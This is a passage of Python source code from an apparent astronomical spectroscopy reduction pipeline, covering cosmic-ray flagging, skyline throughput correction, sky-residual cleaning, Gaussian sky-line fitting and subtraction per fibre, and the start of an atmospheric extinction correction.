[np.nanmin(self.integrated_fibre), np.nanmax(self.integrated_fibre)]
)
plt.title(self.description)
# Check if integrated value is high
median_running = []
step_f = 10
max_value = 2.0 # For stars this is not accurate, as i/m might be between 5 and 100 in the fibres with the star
skip = 0
suspicious_fibres = []
for fibre in range(self.n_spectra):
if fibre < step_f:
median_value = np.nanmedian(
self.integrated_fibre[0: np.int(step_f)]
)
skip = 1
if fibre > self.n_spectra - step_f:
median_value = np.nanmedian(
self.integrated_fibre[-1 - np.int(step_f): -1]
)
skip = 1
if skip == 0:
median_value = np.nanmedian(
self.integrated_fibre[
fibre - np.int(step_f/2): fibre + np.int(step_f/2) # np.int is used instead of // of readability
]
)
median_running.append(median_value)
if self.integrated_fibre[fibre]/median_running[fibre] > max_value:
print(" Fibre {} has a integrated/median ratio of {} -> Might be a cosmic left!".format(fibre, self.integrated_fibre[fibre]/median_running[fibre]))
label = np.str(fibre)
plt.axvline(x=fibre, color="k", linestyle="--")
plt.text(fibre, self.integrated_fibre[fibre] / 2.0, label)
suspicious_fibres.append(fibre)
skip = 0
plt.plot(self.integrated_fibre, label="Corrected", alpha=0.6)
plt.plot(median_running, "k", label="Median", alpha=0.6)
plt.legend(frameon=False, loc=1, ncol=3)
plt.minorticks_on()
#plt.show()
#plt.close()
if plot_suspicious_fibres == True and len(suspicious_fibres) > 0:
# Plotting suspicious fibres..
figures = plot_suspicious_fibres_graph(
self,
suspicious_fibres,
fig_size,
wave_min,
wave_max,
intensity_corrected_fiber=self.intensity_corrected)
if remove_5578 and wave_min < 5578:
print(" Skyline 5578 has been removed. Checking throughput correction...")
flux_5578_medfilt = sig.medfilt(flux_5578, np.int(5))
median_flux_5578_medfilt = np.nanmedian(flux_5578_medfilt)
extra_throughput_correction = flux_5578_medfilt/median_flux_5578_medfilt
# plt.plot(extra_throughput_correction)
# plt.show()
# plt.close()
if plot:
fig = plot_skyline_5578(fig_size, flux_5578, flux_5578_medfilt)
print(" Variations in throughput between {} and {} ".format(
np.nanmin(extra_throughput_correction), np.nanmax(extra_throughput_correction)
))
print(" Applying this extra throughtput correction to all fibres...")
for i in range(self.n_spectra):
self.intensity_corrected[i, :] = (
self.intensity_corrected[i, :]/extra_throughput_correction[i]
)
self.relative_throughput = (
self.relative_throughput * extra_throughput_correction
)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
    def clean_sky_residuals(
        self,
        extra_w=1.3,
        step=25,
        dclip=3.0,
        wave_min=0,
        wave_max=0,
        verbose=False,
        plot=False,
        fig_size=12,
        fibre=0,
    ):
        """
        Clean residual sky features from the fibres, avoiding emission lines.

        This task HAVE TO BE USED WITH EXTREME CARE
        as it has not been properly tested!!!
        It CAN DELETE REAL (faint) ABSORPTION/EMISSION features in spectra!!!
        Use the "1dfit" option for getting a better sky substraction
        ANGEL is keeping this here just in case it is eventually useful...

        Requires self.el (output of identify_el) to decide which wavelength
        ranges contain emission lines and must be left untouched.

        Parameters
        ----------
        extra_w : float (default 1.3)
            Multiplier (in units of FWHM) for the half-width of the exclusion
            window around each identified emission line.
        step : integer (default 25)
            Step passed to smooth_spectrum for the running-median continuum fit.
        dclip : float (default 3.0)
            Clipping threshold, in units of the median absolute deviation of
            (spectrum - fit_median).
        wave_min, wave_max : float (default 0)
            Valid wavelength range; 0 means use self.valid_wave_min /
            self.valid_wave_max.
        verbose : boolean (default False)
            Print diagnostic information.
        plot : boolean (default False)
            Plot before/after spectra (forced True when a single fibre is given).
        fig_size : float (default 12)
            Figure size for the plots.
        fibre : integer (default 0)
            If non-zero, clean (and plot) only this fibre.

        Returns
        -------
        None; self.intensity_corrected is modified in place.
        """
        # verbose=True
        wlm = self.wavelength
        if wave_min == 0:
            wave_min = self.valid_wave_min
        if wave_max == 0:
            wave_max = self.valid_wave_max
        # Exclude ranges with emission lines if needed
        exclude_ranges_low = []
        exclude_ranges_high = []
        exclude_ranges_low_ = []
        exclude_ranges_high_ = []
        if self.el[1][0] != 0:
            # print "  Emission lines identified in the combined spectrum:"
            for el in range(len(self.el[0])):
                # print "  {:3}. - {:7s} {:8.2f} centered at {:8.2f} and FWHM = {:6.2f}".format(el+1,self.el[0][el],self.el[1][el],self.el[2][el],self.el[3][el])
                if (
                    self.el[0][el] == "Ha" or self.el[1][el] == 6583.41
                ):  # Extra extend for Ha and [N II] 6583
                    extra = extra_w * 1.6
                else:
                    extra = extra_w
                exclude_ranges_low_.append(
                    self.el[2][el] - self.el[3][el] * extra
                )  # center-1.3*FWHM/2
                exclude_ranges_high_.append(
                    self.el[2][el] + self.el[3][el] * extra
                )  # center+1.3*FWHM/2
                # print self.el[0][el],self.el[1][el],self.el[2][el],self.el[3][el],exclude_ranges_low[el],exclude_ranges_high[el],extra
            # Check overlapping ranges
            # Merge exclusion windows that overlap; skip_next counts how many of
            # the following raw windows were swallowed by the current merge.
            skip_next = 0
            for i in range(len(exclude_ranges_low_) - 1):
                if skip_next == 0:
                    if exclude_ranges_high_[i] > exclude_ranges_low_[i + 1]:
                        # Ranges overlap, now check if next range also overlaps
                        if i + 2 < len(exclude_ranges_low_):
                            if exclude_ranges_high_[i + 1] > exclude_ranges_low_[i + 2]:
                                exclude_ranges_low.append(exclude_ranges_low_[i])
                                exclude_ranges_high.append(exclude_ranges_high_[i + 2])
                                skip_next = 2
                                if verbose:
                                    print("Double overlap {} {}".format(exclude_ranges_low[-1], exclude_ranges_high[-1]))
                        else:
                            exclude_ranges_low.append(exclude_ranges_low_[i])
                            exclude_ranges_high.append(exclude_ranges_high_[i + 1])
                            skip_next = 1
                            if verbose:
                                print("Overlap {} {}".format(exclude_ranges_low[-1], exclude_ranges_high[-1]))
                    else:
                        exclude_ranges_low.append(exclude_ranges_low_[i])
                        exclude_ranges_high.append(exclude_ranges_high_[i])
                        if verbose:
                            print("Overlap {} {}".format(exclude_ranges_low[-1], exclude_ranges_high[-1]))
                else:
                    # Count down the windows consumed by a previous merge.
                    if skip_next == 1:
                        skip_next = 0
                    if skip_next == 2:
                        skip_next = 1
                if verbose:
                    print(exclude_ranges_low_[i], exclude_ranges_high_[i], skip_next)
            if skip_next == 0:
                exclude_ranges_low.append(exclude_ranges_low_[-1])
                exclude_ranges_high.append(exclude_ranges_high_[-1])
                if verbose:
                    print(exclude_ranges_low_[-1], exclude_ranges_high_[-1], skip_next)
            # print "\n> Cleaning sky residuals in range [",wave_min,",",wave_max,"] avoiding emission lines... "
            print("\n> Cleaning sky residuals avoiding emission lines... ")
            if verbose:
                print("  Excluded ranges using emission line parameters:")
                for i in range(len(exclude_ranges_low_)):
                    print(exclude_ranges_low_[i], exclude_ranges_high_[i])
                print("  Excluded ranges considering overlaps: ")
                for i in range(len(exclude_ranges_low)):
                    print(exclude_ranges_low[i], exclude_ranges_high[i])
                print(" ")
        else:
            # No emission lines identified: use a dummy window far to the red
            # so nothing in the observed range is excluded.
            exclude_ranges_low.append(20000.0)
            exclude_ranges_high.append(30000.0)
            print("\n> Cleaning sky residuals...")
        say_status = 0
        if fibre != 0:
            f_i = fibre
            f_f = fibre + 1
            print("  Checking fibre {} (only this fibre is corrected, use fibre = 0 for all)...".format(fibre))
            plot = True
        else:
            f_i = 0
            f_f = self.n_spectra
        for fibre in range(f_i, f_f):  # (self.n_spectra):
            if fibre == say_status:
                print("  Checking fibre {} ...".format(fibre))
                say_status = say_status + 100
            s = self.intensity_corrected[fibre]
            fit_median = smooth_spectrum(
                wlm,
                s,
                step=step,
                wave_min=wave_min,
                wave_max=wave_max,
                weight_fit_median=1.0,
                plot=False,
            )
            old = []
            if plot:
                # Keep a copy of the uncorrected spectrum for the plots below.
                for i in range(len(s)):
                    old.append(s[i])
            disp = s - fit_median
            dispersion = np.nanmedian(np.abs(disp))
            # rango indexes the current exclusion window; imprimir gates the
            # one-time "Excluding range" message per window.
            rango = 0
            imprimir = 1
            for i in range(len(wlm) - 1):
                # if wlm[i] > wave_min and wlm[i] < wave_max : # CLEAN ONLY IN VALID WAVEVELENGTHS
                if (
                    wlm[i] >= exclude_ranges_low[rango]
                    and wlm[i] <= exclude_ranges_high[rango]
                ):
                    # Inside an emission-line window: leave the pixel untouched.
                    if verbose == True and imprimir == 1:
                        print("  Excluding range [ {} , {} ] as it has an emission line".format(
                            exclude_ranges_low[rango], exclude_ranges_high[rango]))
                    if imprimir == 1:
                        imprimir = 0
                    # print "  Checking ", wlm[i],"  NOT CORRECTED ",s[i], s[i]-fit_median[i]
                else:
                    if np.isnan(s[i]) == True:
                        s[i] = fit_median[i]  # nan for median value
                    if (
                        disp[i] > dispersion * dclip
                        and disp[i + 1] < -dispersion * dclip
                    ):
                        s[i] = fit_median[i]
                        s[i + 1] = fit_median[i + 1]  # "P-Cygni-like structures
                        if verbose:
                            print("  Found P-Cygni-like feature in {}".format(wlm[i]))
                    if disp[i] > dispersion * dclip or disp[i] < -dispersion * dclip:
                        s[i] = fit_median[i]
                        if verbose:
                            print("  Clipping feature in {}".format(wlm[i]))
                if wlm[i] > exclude_ranges_high[rango] and imprimir == 0:
                    # Passed the end of the current window: advance to the next one.
                    if verbose:
                        print("  Checked {} End range {} {} {}".format(
                            wlm[i], rango,
                            exclude_ranges_low[rango],
                            exclude_ranges_high[rango]
                        )
                        )
                    rango = rango + 1
                    imprimir = 1
                if rango == len(exclude_ranges_low):
                    rango = len(exclude_ranges_low) - 1
                # print "  Checking ", wlm[i]," CORRECTED IF NEEDED",s[i], s[i]-fit_median[i]
            # if plot:
            #     for i in range(6):
            #         plt.figure(figsize=(fig_size, fig_size/2.5))
            #         plt.plot(wlm,old-fit_median, "r-", alpha=0.4)
            #         plt.plot(wlm,fit_median-fit_median,"g-", alpha=0.5)
            #         plt.axhline(y=dispersion*dclip, color="g", alpha=0.5)
            #         plt.axhline(y=-dispersion*dclip, color="g", alpha=0.5)
            #         plt.plot(wlm,s-fit_median, "b-", alpha=0.7)
            #
            #         for exclude in range(len(exclude_ranges_low)):
            #             plt.axvspan(exclude_ranges_low[exclude], exclude_ranges_high[exclude], facecolor='g', alpha=0.15,zorder=3)
            #
            #         plt.ylim(-100,200)
            #         if i == 0: plt.xlim(wlm[0]-10,wlm[-1]+10)
            #         if i == 1: plt.xlim(wlm[0],6500)    # THIS IS FOR 1000R
            #         if i == 2: plt.xlim(6500,6700)
            #         if i == 3: plt.xlim(6700,7000)
            #         if i == 4: plt.xlim(7000,7300)
            #         if i == 5: plt.xlim(7300,wlm[-1])
            #         plt.minorticks_on()
            #         plt.xlabel("Wavelength [$\AA$]")
            #         plt.ylabel("Flux / continuum")
            #         plt.show()
            #         plt.close()
            if plot:
                for i in range(6):
                    plt.figure(figsize=(fig_size, fig_size / 2.5))
                    plt.plot(wlm, old, "r-", alpha=0.4)
                    plt.plot(wlm, fit_median, "g-", alpha=0.5)
                    # plt.axhline(y=dispersion*dclip, color="g", alpha=0.5)
                    # plt.axhline(y=-dispersion*dclip, color="g", alpha=0.5)
                    plt.plot(wlm, s, "b-", alpha=0.7)
                    for exclude in range(len(exclude_ranges_low)):
                        plt.axvspan(
                            exclude_ranges_low[exclude],
                            exclude_ranges_high[exclude],
                            facecolor="g",
                            alpha=0.15,
                            zorder=3,
                        )
                    plt.ylim(-300, 300)
                    if i == 0:
                        plt.xlim(wlm[0] - 10, wlm[-1] + 10)
                    if i == 1:
                        plt.xlim(wlm[0], 6500)  # THIS IS FOR 1000R
                    if i == 2:
                        plt.xlim(6500, 6700)
                    if i == 3:
                        plt.xlim(6700, 7000)
                    if i == 4:
                        plt.xlim(7000, 7300)
                    if i == 5:
                        plt.xlim(7300, wlm[-1])
                    plt.minorticks_on()
                    plt.xlabel("Wavelength [$\AA$]")
                    plt.ylabel("Flux / continuum")
                    # plt.show()
                    # plt.close()
            self.intensity_corrected[fibre, :] = s
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def fit_and_substract_sky_spectrum(
self,
sky,
w=1000,
spectra=1000,
# If rebin == True, it fits all wavelengths to be at the same wavelengths that SKY spectrum...
rebin=False,
brightest_line="Ha",
brightest_line_wavelength=6563.0,
maxima_sigma=3.0,
ymin=-50,
ymax=1000,
wmin=0,
wmax=0,
auto_scale_sky=False,
warnings=False,
verbose=False,
plot=False,
fig_size=12,
fibre=0,
):
"""
Given a 1D sky spectrum, this task fits
sky lines of each spectrum individually and substracts sky
Needs the observed wavelength (brightest_line_wavelength) of the brightest emission line (brightest_line) .
w is the wavelength
spec the 2D spectra
Parameters
----------
sky
w
spectra
rebin
brightest_line
brightest_line_wavelength
maxima_sigma
ymin
ymax
wmin
wmax
auto_scale_sky
warnings
verbose
plot
fig_size
fibre
Returns
-------
"""
if brightest_line_wavelength == 6563:
print("\n\n> WARNING: This is going to FAIL as the wavelength of the brightest emission line has not been included !!!")
print(" USING brightest_line_wavelength = 6563 as default ...\n\n")
brightest_line_wavelength_rest = 6562.82
if brightest_line == "O3" or brightest_line == "O3b":
brightest_line_wavelength_rest = 5006.84
if brightest_line == "Hb" or brightest_line == "hb":
brightest_line_wavelength_rest = 4861.33
print(" Using {:3} at rest wavelength {:6.2f} identified by the user at {:6.2f} to avoid fitting emission lines...".format(
brightest_line, brightest_line_wavelength_rest, brightest_line_wavelength
))
redshift = brightest_line_wavelength/brightest_line_wavelength_rest - 1.0
if w == 1000:
w = self.wavelength
if spectra == 1000:
spectra = copy.deepcopy(self.intensity_corrected)
if wmin == 0:
wmin = w[0]
if wmax == 0:
wmax = w[-1]
# Read file with sky emission lines
sky_lines_file = "sky_lines.dat"
(
sl_center,
sl_name,
sl_fnl,
sl_lowlow,
sl_lowhigh,
sl_highlow,
sl_highhigh,
sl_lmin,
sl_lmax,
) = read_table(sky_lines_file, ["f", "s", "f", "f", "f", "f", "f", "f", "f"])
number_sl = len(sl_center)
# MOST IMPORTANT EMISSION LINES IN RED
# 6300.30 [OI] -0.263 30.0 15.0 20.0 40.0
# 6312.10 [SIII] -0.264 30.0 18.0 5.0 20.0
# 6363.78 [OI] -0.271 20.0 4.0 5.0 30.0
# 6548.03 [NII] -0.296 45.0 15.0 55.0 75.0
# 6562.82 Ha -0.298 50.0 25.0 35.0 60.0
# 6583.41 [NII] -0.300 62.0 42.0 7.0 35.0
# 6678.15 HeI -0.313 20.0 6.0 6.0 20.0
# 6716.47 [SII] -0.318 40.0 15.0 22.0 45.0
# 6730.85 [SII] -0.320 50.0 30.0 7.0 35.0
# 7065.28 HeI -0.364 30.0 7.0 7.0 30.0
# 7135.78 [ArIII] -0.374 25.0 6.0 6.0 25.0
# 7318.39 [OII] -0.398 30.0 6.0 20.0 45.0
# 7329.66 [OII] -0.400 40.0 16.0 10.0 35.0
# 7751.10 [ArIII] -0.455 30.0 15.0 15.0 30.0
# 9068.90 [S-III] -0.594 30.0 15.0 15.0 30.0
el_list_no_z = [
6300.3,
6312.10,
6363.78,
6548.03,
6562.82,
6583.41,
6678.15,
6716.47,
6730.85,
7065.28,
7135.78,
7318.39,
7329.66,
7751.1,
9068.9,
]
el_list = (redshift + 1) * np.array(el_list_no_z)
# [OI] [SIII] [OI] Ha+[NII] HeI [SII] HeI [ArIII] [OII] [ArIII] [SIII]
el_low_list_no_z = [
6296.3,
6308.1,
6359.8,
6544.0,
6674.2,
6712.5,
7061.3,
7131.8,
7314.4,
7747.1,
9063.9,
]
el_high_list_no_z = [
6304.3,
6316.1,
6367.8,
6590.0,
6682.2,
6736.9,
7069.3,
7139.8,
7333.7,
7755.1,
9073.9,
]
el_low_list = (redshift + 1) * np.array(el_low_list_no_z)
el_high_list = (redshift + 1) * np.array(el_high_list_no_z)
# Double Skylines
dsky1 = [
6257.82,
6465.34,
6828.22,
6969.70,
7239.41,
7295.81,
7711.50,
7750.56,
7853.391,
7913.57,
7773.00,
7870.05,
8280.94,
8344.613,
9152.2,
9092.7,
9216.5,
8827.112,
8761.2,
0,
] # 8760.6, 0]#
dsky2 = [
6265.50,
6470.91,
6832.70,
6978.45,
7244.43,
7303.92,
7715.50,
7759.89,
7860.662,
7921.02,
7780.43,
7879.96,
8288.34,
8352.78,
9160.9,
9102.8,
9224.8,
8836.27,
8767.7,
0,
] # 8767.2, 0] #
say_status = 0
# plot=True
# verbose = True
# warnings = True
self.wavelength_offset_per_fibre = []
self.sky_auto_scale = []
if fibre != 0:
f_i = fibre
f_f = fibre + 1
print(" Checking fibre {} (only this fibre is corrected, use fibre = 0 for all)...".format(fibre))
plot = True
verbose = True
warnings = True
else:
f_i = 0
f_f = self.n_spectra
for fibre in range(f_i, f_f): # (self.n_spectra):
if fibre == say_status:
print(" Checking fibre {:4} ... ({:6.2f} % completed) ...".format(
fibre,
fibre * 100.0 / self.n_spectra
)
)
say_status = say_status + 20
# Gaussian fits to the sky spectrum
sl_gaussian_flux = []
sl_gaussian_sigma = []
sl_gauss_center = []
skip_sl_fit = [] # True emission line, False no emission line
j_lines = 0
el_low = el_low_list[j_lines]
el_high = el_high_list[j_lines]
sky_sl_gaussian_fitted = copy.deepcopy(sky)
di = 0
if verbose:
print("\n> Performing Gaussian fitting to sky lines in sky spectrum...")
for i in range(number_sl):
if sl_center[i] > el_high:
while sl_center[i] > el_high:
j_lines = j_lines + 1
if j_lines < len(el_low_list) - 1:
el_low = el_low_list[j_lines]
el_high = el_high_list[j_lines]
# print "Change to range ",el_low,el_high
else:
el_low = w[-1] + 1
el_high = w[-1] + 2
if sl_fnl[i] == 0:
plot_fit = False
else:
plot_fit = True
if sl_center[i] == dsky1[di]:
warnings_ = False
if sl_fnl[i] == 1:
warnings_ = True
if verbose:
print(" Line {} blended with {}".format(sl_center[i], dsky2[di]))
resultado = dfluxes(
w,
sky_sl_gaussian_fitted,
sl_center[i],
dsky2[di],
lowlow=sl_lowlow[i],
lowhigh=sl_lowhigh[i],
highlow=sl_highlow[i],
highhigh=sl_highhigh[i],
lmin=sl_lmin[i],
lmax=sl_lmax[i],
fmin=0,
fmax=0,
broad1=2.1 * 2.355,
broad2=2.1 * 2.355,
plot=plot_fit,
verbose=False,
plot_sus=False,
fcal=False,
warnings=warnings_,
) # Broad is FWHM for Gaussian sigm a= 1,
di = di + 1
else:
resultado = fluxes(
w,
sky_sl_gaussian_fitted,
sl_center[i],
lowlow=sl_lowlow[i],
lowhigh=sl_lowhigh[i],
highlow=sl_highlow[i],
highhigh=sl_highhigh[i],
lmin=sl_lmin[i],
lmax=sl_lmax[i],
fmin=0,
fmax=0,
broad=2.1 * 2.355,
plot=plot_fit,
verbose=False,
plot_sus=False,
fcal=False,
warnings=warnings,
) # Broad is FWHM for Gaussian sigm a= 1,
sl_gaussian_flux.append(resultado[3])
sky_sl_gaussian_fitted = resultado[11]
sl_gauss_center.append(resultado[1])
sl_gaussian_sigma.append(resultado[5] / 2.355)
if el_low < sl_center[i] < el_high:
if verbose:
print(" SKY line {} in EMISSION LINE !".format(sl_center[i]))
skip_sl_fit.append(True)
else:
skip_sl_fit.append(False)
# print " Fitted wavelength for sky line ",sl_center[i]," : ",resultado[1]," ",resultado[5]
if plot_fit:
if verbose:
print(" Fitted wavelength for sky line {} : {} sigma = {}".format(
sl_center[i], sl_gauss_center[i], sl_gaussian_sigma[i])
)
wmin = sl_lmin[i]
wmax = sl_lmax[i]
# Gaussian fit to object spectrum
object_sl_gaussian_flux = []
object_sl_gaussian_sigma = []
ratio_object_sky_sl_gaussian = []
dif_center_obj_sky = []
spec = spectra[fibre]
object_sl_gaussian_fitted = copy.deepcopy(spec)
object_sl_gaussian_center = []
di = 0
if verbose:
print("\n> Performing Gaussian fitting to sky lines in fibre {} of object data...".format(fibre))
for i in range(number_sl):
if sl_fnl[i] == 0:
plot_fit = False
else:
plot_fit = True
if skip_sl_fit[i]:
if verbose:
print(" SKIPPING SKY LINE {} as located within the range of an emission line!".format(
sl_center[i]))
object_sl_gaussian_flux.append(
float("nan")
) # The value of the SKY SPECTRUM
object_sl_gaussian_center.append(float("nan"))
object_sl_gaussian_sigma.append(float("nan"))
dif_center_obj_sky.append(float("nan"))
else:
if sl_center[i] == dsky1[di]:
warnings_ = False
if sl_fnl[i] == 1:
warnings_ = True
if verbose:
print(" Line {} blended with {}".format(sl_center[i], dsky2[di]))
resultado = dfluxes(
w,
object_sl_gaussian_fitted,
sl_center[i],
dsky2[di],
lowlow=sl_lowlow[i],
lowhigh=sl_lowhigh[i],
highlow=sl_highlow[i],
highhigh=sl_highhigh[i],
lmin=sl_lmin[i],
lmax=sl_lmax[i],
fmin=0,
fmax=0,
broad1=sl_gaussian_sigma[i] * 2.355,
broad2=sl_gaussian_sigma[i] * 2.355,
plot=plot_fit,
verbose=False,
plot_sus=False,
fcal=False,
warnings=warnings_,
)
di = di + 1
if (
resultado[3] > 0
and resultado[5] / 2.355 < maxima_sigma
and resultado[13] > 0
and resultado[14] / 2.355 < maxima_sigma
): # and resultado[5] < maxima_sigma: # -100000.: #0:
use_sigma = resultado[5] / 2.355
object_sl_gaussian_flux.append(resultado[3])
object_sl_gaussian_fitted = resultado[11]
object_sl_gaussian_center.append(resultado[1])
object_sl_gaussian_sigma.append(use_sigma)
dif_center_obj_sky.append(
object_sl_gaussian_center[i] - sl_gauss_center[i]
)
else:
if verbose:
print(" Bad fit for {}! ignoring it...".format(sl_center[i]))
object_sl_gaussian_flux.append(float("nan"))
object_sl_gaussian_center.append(float("nan"))
object_sl_gaussian_sigma.append(float("nan"))
dif_center_obj_sky.append(float("nan"))
skip_sl_fit[i] = True # We don't substract this fit
else:
resultado = fluxes(
w,
object_sl_gaussian_fitted,
sl_center[i],
lowlow=sl_lowlow[i],
lowhigh=sl_lowhigh[i],
highlow=sl_highlow[i],
highhigh=sl_highhigh[i],
lmin=sl_lmin[i],
lmax=sl_lmax[i],
fmin=0,
fmax=0,
broad=sl_gaussian_sigma[i] * 2.355,
plot=plot_fit,
verbose=False,
plot_sus=False,
fcal=False,
warnings=warnings,
) # Broad is FWHM for Gaussian sigma= 1,
# print sl_center[i],sl_gaussian_sigma[i], resultado[5]/2.355, maxima_sigma
if (
resultado[3] > 0 and resultado[5] / 2.355 < maxima_sigma
): # and resultado[5] < maxima_sigma: # -100000.: #0:
object_sl_gaussian_flux.append(resultado[3])
object_sl_gaussian_fitted = resultado[11]
object_sl_gaussian_center.append(resultado[1])
object_sl_gaussian_sigma.append(resultado[5] / 2.355)
dif_center_obj_sky.append(
object_sl_gaussian_center[i] - sl_gauss_center[i]
)
else:
if verbose:
print(" Bad fit for {}! ignoring it...".format(sl_center[i]))
object_sl_gaussian_flux.append(float("nan"))
object_sl_gaussian_center.append(float("nan"))
object_sl_gaussian_sigma.append(float("nan"))
dif_center_obj_sky.append(float("nan"))
skip_sl_fit[i] = True # We don't substract this fit
ratio_object_sky_sl_gaussian.append(
old_div(object_sl_gaussian_flux[i], sl_gaussian_flux[i])
) # TODO: to remove once sky_line_fitting is active and we can do 1Dfit
# Scale sky lines that are located in emission lines or provided negative values in fit
# reference_sl = 1 # Position in the file! Position 1 is sky line 6363.4
# sl_ref_ratio = sl_gaussian_flux/sl_gaussian_flux[reference_sl]
if verbose:
print("\n> Correcting skylines for which we couldn't get a Gaussian fit...\n")
for i in range(number_sl):
if skip_sl_fit[i] == True:
# Use known center, sigma of the sky and peak
gauss_fix = sl_gaussian_sigma[i]
small_center_correction = 0.0
# Check if center of previous sky line has a small difference in wavelength
small_center_correction = np.nanmedian(dif_center_obj_sky[0:i])
if verbose:
print("- Small correction of center wavelength of sky line {} : {}".format(
sl_center[i], small_center_correction))
object_sl_gaussian_fitted = substract_given_gaussian(
w,
object_sl_gaussian_fitted,
sl_center[i] + small_center_correction,
peak=0,
sigma=gauss_fix,
flux=0,
search_peak=True,
lowlow=sl_lowlow[i],
lowhigh=sl_lowhigh[i],
highlow=sl_highlow[i],
highhigh=sl_highhigh[i],
lmin=sl_lmin[i],
lmax=sl_lmax[i],
plot=False,
verbose=verbose,
)
# Substract second Gaussian if needed !!!!!
for di in range(len(dsky1) - 1):
if sl_center[i] == dsky1[di]:
if verbose:
print(" This was a double sky line, also substracting {} at {}".format(
dsky2[di], np.array(dsky2[di]) + small_center_correction))
object_sl_gaussian_fitted = substract_given_gaussian(
w,
object_sl_gaussian_fitted,
np.array(dsky2[di]) + small_center_correction,
peak=0,
sigma=gauss_fix,
flux=0,
search_peak=True,
lowlow=sl_lowlow[i],
lowhigh=sl_lowhigh[i],
highlow=sl_highlow[i],
highhigh=sl_highhigh[i],
lmin=sl_lmin[i],
lmax=sl_lmax[i],
plot=False,
verbose=verbose,
)
# wmin,wmax = 6100,6500
# ymin,ymax= -100,400
#
# wmin,wmax = 6350,6700
# wmin,wmax = 7100,7700
# wmin,wmax = 7600,8200
# wmin,wmax = 8200,8500
# wmin,wmax = 7350,7500
# wmin,wmax=6100, 8500 #7800, 8000#6820, 6850 #6700,7000 #6300,6450#7500
# wmin,wmax = 8700,9300
# ymax=800
if plot:
plt.figure(figsize=(11, 4))
plt.plot(w, spec, "y", alpha=0.7, label="Object")
plt.plot(
w,
object_sl_gaussian_fitted,
"k",
alpha=0.5,
label="Obj - sky fitted",
)
plt.plot(w, sky_sl_gaussian_fitted, "r", alpha=0.5, label="Sky fitted")
plt.plot(w, spec - sky, "g", alpha=0.5, label="Obj - sky")
plt.plot(
w,
object_sl_gaussian_fitted - sky_sl_gaussian_fitted,
"b",
alpha=0.9,
label="Obj - sky fitted - rest sky",
)
plt.xlim(wmin, wmax)
plt.ylim(ymin, ymax)
ptitle = "Fibre " + np.str(fibre) # +" with rms = "+np.str(rms[i])
plt.title(ptitle)
plt.xlabel("Wavelength [$\AA$]")
plt.ylabel("Flux [counts]")
plt.legend(frameon=True, loc=2, ncol=5)
plt.minorticks_on()
for i in range(len(el_list)):
plt.axvline(x=el_list[i], color="k", linestyle="--", alpha=0.5)
for i in range(number_sl):
if sl_fnl[i] == 1:
plt.axvline(
x=sl_center[i], color="brown", linestyle="-", alpha=1
)
else:
plt.axvline(
x=sl_center[i], color="y", linestyle="--", alpha=0.6
)
for i in range(len(dsky2) - 1):
plt.axvline(x=dsky2[i], color="orange", linestyle="--", alpha=0.6)
# plt.show()
# plt.close()
offset = np.nanmedian(
np.array(object_sl_gaussian_center) - np.array(sl_gauss_center)
)
if verbose:
# reference_sl = 1 # Position in the file!
# sl_ref_ratio = sl_gaussian_flux/sl_gaussian_flux[reference_sl]
# print "\n n line fsky fspec fspec/fsky l_obj-l_sky fsky/6363.4 sigma_sky sigma_fspec"
# #print "\n n c_object c_sky c_obj-c_sky"
# for i in range(number_sl):
# if skip_sl_fit[i] == False: print "{:2} {:6.1f} {:8.2f} {:8.2f} {:7.4f} {:5.2f} {:6.3f} {:6.3f} {:6.3f}" .format(i+1,sl_center[i],sl_gaussian_flux[i],object_sl_gaussian_flux[i],ratio_object_sky_sl_gaussian[i],object_sl_gaussian_center[i]-sl_gauss_center[i],sl_ref_ratio[i],sl_gaussian_sigma[i],object_sl_gaussian_sigma[i])
# #if skip_sl_fit[i] == False: print "{:2} {:9.3f} {:9.3f} {:9.3f}".format(i+1, object_sl_gaussian_center[i], sl_gauss_center[i], dif_center_obj_sky[i])
#
print("\n> Median center offset between OBJ and SKY : {} A\n> Median gauss for the OBJECT {} A".format(offset, np.nanmedian(object_sl_gaussian_sigma)))
print("> Median flux OBJECT / SKY = {}".format(np.nanmedian(ratio_object_sky_sl_gaussian)))
self.wavelength_offset_per_fibre.append(offset)
# plt.plot(object_sl_gaussian_center, ratio_object_sky_sl_gaussian, "r+")
if auto_scale_sky:
if verbose:
print("\n> As requested, using this value to scale sky spectrum before substraction... ")
auto_scale = np.nanmedian(ratio_object_sky_sl_gaussian)
self.sky_auto_scale.append(np.nanmedian(ratio_object_sky_sl_gaussian))
# self.sky_emission = auto_scale * self.sky_emission
else:
auto_scale = 1.0
self.sky_auto_scale.append(1.0)
if rebin:
if verbose:
print("\n> Rebinning the spectrum of fibre {} to match sky spectrum...".format(fibre))
f = object_sl_gaussian_fitted
f_new = rebin_spec_shift(w, f, offset)
else:
f_new = object_sl_gaussian_fitted
self.intensity_corrected[fibre] = (
f_new - auto_scale * sky_sl_gaussian_fitted
)
# check offset center wavelength
# good_sl_center=[]
# good_sl_center_dif=[]
# plt.figure(figsize=(14, 4))
# for i in range(number_sl):
# if skip_sl_fit[i] == False:
# plt.plot(sl_center[i],dif_center_obj_sky[i],"g+", alpha=0.7, label="Object")
# good_sl_center.append(sl_center[i])
# good_sl_center_dif.append(dif_center_obj_sky[i])
#
# a1x,a0x = np.polyfit(good_sl_center, good_sl_center_dif, 1)
# fx = a0x + a1x*w
# #print a0x, a1x
# offset = np.nanmedian(good_sl_center_dif)
# print "median =",offset
# plt.plot(w,fx,"b", alpha=0.7, label="Fit")
# plt.axhline(y=offset, color='r', linestyle='--')
# plt.xlim(6100,9300)
# #plt.ylim(ymin,ymax)
# ptitle = "Fibre "+np.str(fibre)#+" with rms = "+np.str(rms[i])
# plt.title(ptitle)
# plt.xlabel("Wavelength [$\AA$]")
# plt.ylabel("c_obj - c_sky")
# #plt.legend(frameon=True, loc=2, ncol=4)
# plt.minorticks_on()
# plt.show()
# plt.close()
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def do_extinction_curve(
self, observatory_file=pth.join(DATA_PATH, "ssoextinct.dat"), plot=True
):
"""
Parameters
----------
observatory_file
plot
Returns
-------
"""
print("\n> Computing extinction at given airmass...")
# Read data
data_observatory = np.loadtxt(observatory_file, unpack=True)
extinction_curve_wavelengths = data_observatory[0]
extinction_curve = data_observatory[1]
extinction_corrected_airmass = 10 ** (0.4 * self.airmass * extinction_curve)
# Make fit
tck = interpolate.splrep(
extinction_curve_wavelengths, extinction_corrected_airmass, s=0
)
self.extinction_correction = interpolate.splev(self.wavelength, tck, der=0)
# Plot
if plot:
plt.figure(figsize=(10, 5))
